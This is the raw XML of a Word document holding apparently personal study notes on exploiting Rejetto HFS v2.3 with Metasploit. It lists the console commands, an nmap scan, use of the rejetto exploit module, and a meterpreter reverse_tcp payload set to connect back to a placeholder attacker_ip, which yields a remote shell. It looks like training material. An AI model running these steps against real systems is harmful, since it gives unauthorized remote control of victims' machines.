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70C3" w14:textId="619AEF6C" w:rsidR="00853ABF" w:rsidRPr="00955DD4" w:rsidRDefault="009F13C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting A Vulnerable HTTP File Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00955DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FEEBF" w14:textId="77777777" w:rsidR="009F13C5" w:rsidRDefault="009F13C5"/>
    <w:p w14:paraId="241D0AA0" w14:textId="4CAB4F41" w:rsidR="00DE73AA" w:rsidRDefault="00955DD4">
      <w:r>
        <w:t xml:space="preserve">Specifically </w:t>
      </w:r>
      <w:r w:rsidR="00DE73AA">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r>
        <w:t>sharing</w:t>
      </w:r>
      <w:r w:rsidR="00DE73AA">
        <w:t xml:space="preserve"> files and </w:t>
      </w:r>
      <w:r>
        <w:t>documents</w:t>
      </w:r>
      <w:r w:rsidR="00DE73AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3808318C" w14:textId="6AB2C5F3" w:rsidR="00955DD4" w:rsidRDefault="00955DD4">
      <w:r>
        <w:t>http file server is only used to host and share file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3865B277" w14:textId="13989529" w:rsidR="00955DD4" w:rsidRDefault="00955DD4" w:rsidP="00955DD4">
      <w:r>
        <w:t>http:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C0156" w14:textId="6AE8987C" w:rsidR="00955DD4" w:rsidRDefault="00955DD4" w:rsidP="00955DD4">
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687752ED" w14:textId="77777777" w:rsidR="00955DD4" w:rsidRDefault="00955DD4"/>
    <w:p w14:paraId="6C629559" w14:textId="70E53FFB" w:rsidR="00955DD4" w:rsidRDefault="00955DD4">
      <w:r>
        <w:t>Web servers can be used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to host and share </w:t>
      </w:r>
      <w:r>
        <w:t>files/</w:t>
      </w:r>
      <w:r>
        <w:t>documents</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and also used to host the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19B2BB" w14:textId="77777777" w:rsidR="00955DD4" w:rsidRDefault="00955DD4"/>
    <w:p w14:paraId="74D974C1" w14:textId="39113FAB" w:rsidR="00955DD4" w:rsidRDefault="00955DD4">
      <w:r w:rsidRPr="00955DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto HFS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> free and open-source http file server (window &amp; </w:t>
      </w:r>
      <w:r w:rsidR="00964FD6">
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728F4E0F" w14:textId="77777777" w:rsidR="00955DD4" w:rsidRDefault="00955DD4"/>
    <w:p w14:paraId="4A546F07" w14:textId="4F68E3AD" w:rsidR="00955DD4" w:rsidRDefault="00955DD4">
      <w:r w:rsidRPr="00955DD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto HFS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B94AA7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">v2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00B94AA7">
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vuln to RCE attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B97A355" w14:textId="77777777" w:rsidR="00955DD4" w:rsidRPr="00955DD4" w:rsidRDefault="00955DD4"/>
    <w:p w14:paraId="7A365564" w14:textId="3CBB6B05" w:rsidR="00955DD4" w:rsidRPr="00964FD6" w:rsidRDefault="00B94AA7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00964FD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MSF has exploit module for </w:t>
      </w:r>
      <w:r w:rsidR="00557965" w:rsidRPr="00964FD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rejetto HFS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B664EE" w14:textId="77777777" w:rsidR="00557965" w:rsidRDefault="00557965"/>
    <w:p w14:paraId="52FD4268" w14:textId="40920532" w:rsidR="00A7207E" w:rsidRPr="00A7207E" w:rsidRDefault="00A7207E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7207E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B7FC1" w14:textId="291D3C5D" w:rsidR="00A7207E" w:rsidRDefault="00A7207E"/>
    <w:p w14:paraId="0C6F29E6" w14:textId="6FEDA77D" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77199F83" w14:textId="03F870CE" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F458C6" w14:textId="1C4D6D48" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t xml:space="preserve">Db_status </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C410F" w14:textId="784A05F7" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Workspace -a HFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874EAFD" w14:textId="5BC25C9C" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61385334" w14:textId="10E8E552" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Setg RHOSTS target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F1C06" w14:textId="4492F35D" w:rsidR="00A7207E" w:rsidRDefault="00A7207E" w:rsidP="00A7207E">
      <w:r>
        <w:t>Setg RHOST target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB67512" w14:textId="77777777" w:rsidR="00A7207E" w:rsidRDefault="00A7207E"/>
    <w:p w14:paraId="0D1F1717" w14:textId="5F49BF50" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Db_nmap -sS -sV -O target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C63A5F" w14:textId="6AFE7183" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t># This store the finded values and data in the database</w:t>
      </w:r>
      <w:r w:rsidR="00964FD6">
        <w:t xml:space="preserve"> selected workspace</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F0BB84" w14:textId="77777777" w:rsidR="00A7207E" w:rsidRDefault="00A7207E"/>
    <w:p w14:paraId="2668FD2F" w14:textId="301A2B8B" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Search type:exploit name:rejetto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53101272" w14:textId="7EC67B0B" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Use (index no /name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B082DB" w14:textId="4CFFD09E" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t xml:space="preserve">Show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B6AE2" w14:textId="582B6B6E" w:rsidR="00955DD4" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t xml:space="preserve">Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2866E6" w14:textId="31477D4D" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t># Want to get more info about it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC0CB5" w14:textId="77777777" w:rsidR="00A7207E" w:rsidRDefault="00A7207E"/>
    <w:p w14:paraId="31B0E5F2" w14:textId="58CBAA65" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BE227" w14:textId="0442C7B9" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t># get the meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7C690" w14:textId="66166A26" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DA45C" w14:textId="4BC7D1ED" w:rsidR="00A7207E" w:rsidRDefault="001C75D1">
      <w:r>
        <w:t># we get 32 bit meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E11273E" w14:textId="77777777" w:rsidR="001C75D1" w:rsidRDefault="001C75D1"/>
    <w:p w14:paraId="6E150AF6" w14:textId="72352678" w:rsidR="00A7207E" w:rsidRPr="00A7207E" w:rsidRDefault="00A7207E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7207E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access on the browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2FC954" w14:textId="77777777" w:rsidR="00A7207E" w:rsidRDefault="00A7207E"/>
    <w:p w14:paraId="4D839661" w14:textId="683EEEF0" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="0002465A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target_ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73A766F6" w14:textId="77777777" w:rsidR="00964FD6" w:rsidRDefault="00964FD6"/>
    <w:p w14:paraId="7D824618" w14:textId="34672E57" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3">
      <w:r>
        <w:t xml:space="preserve"># we change the </w:t>
      </w:r>
      <w:r w:rsidR="00CB7359">
        <w:t xml:space="preserve">default </w:t>
      </w:r>
      <w:r>
        <w:t>payload based on the architecture of the system.</w:t>
      </w:r>
      <w:r w:rsidR="001C75D1">
        <w:t xml:space="preserve"> (target os as well as </w:t>
      </w:r>
      <w:r w:rsidR="001C75D1">
        <w:t>architecture</w:t>
      </w:r>
      <w:r w:rsidR="001C75D1">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20809495" w14:textId="72F697D2" w:rsidR="00A7207E" w:rsidRDefault="00A7207E">
      <w:r>
        <w:t xml:space="preserve">set the payload  </w:t>
      </w:r>
      <w:r w:rsidR="00A24ED3">
        <w:t>windows/x64/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidR="001C75D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C9A2E" w14:textId="73C3D2DE" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7841BE3C" w14:textId="6BAF1CE6" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3">
      <w:r>
        <w:t>set LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEDD5D0" w14:textId="7F6C5A97" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3">
      <w:r>
        <w:t>set LHOST attacker_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FD59E3" w14:textId="24C507FE" w:rsidR="00A7207E" w:rsidRDefault="00A24ED3">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1586551D" w14:textId="77777777" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3"/>
    <w:p w14:paraId="201C25B2" w14:textId="3A7A64EE" w:rsidR="001C75D1" w:rsidRDefault="001C75D1">
      <w:r>
        <w:t>get the meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10739CB3" w14:textId="516A3532" w:rsidR="001C75D1" w:rsidRDefault="001C75D1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E3F7F8" w14:textId="099E4CF2" w:rsidR="001C75D1" w:rsidRDefault="001C75D1" w:rsidP="001C75D1">
      <w:r>
        <w:t xml:space="preserve"># we get </w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bit meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750FAB78" w14:textId="77777777" w:rsidR="00A24ED3" w:rsidRDefault="00A24ED3"/>
    <w:p w14:paraId="5E34C92C" w14:textId="77777777" w:rsidR="001C75D1" w:rsidRDefault="001C75D1"/>
    <w:sectPr w:rsidR="001C7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FC"/>
    <w:rsid w:val="00015282"/>
    <w:rsid w:val="001C75D1"/>
    <w:rsid w:val="003935FC"/>
    <w:rsid w:val="00487AE7"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00557965"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00955DD4"/>
    <w:rsid w:val="00964FD6"/>
    <w:rsid w:val="009F13C5"/>
    <w:rsid w:val="009F3E45"/>
    <w:rsid w:val="00A24ED3"/>
    <w:rsid w:val="00A7207E"/>
    <w:rsid w:val="00B94AA7"/>
    <w:rsid w:val="00CB7359"/>
    <w:rsid w:val="00D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DC00"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EAD6288C-B2F7-4958-9A6A-E3C74BCB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arget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171</Words>
  <Characters>1029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2025-10-06T04:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-06T05:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>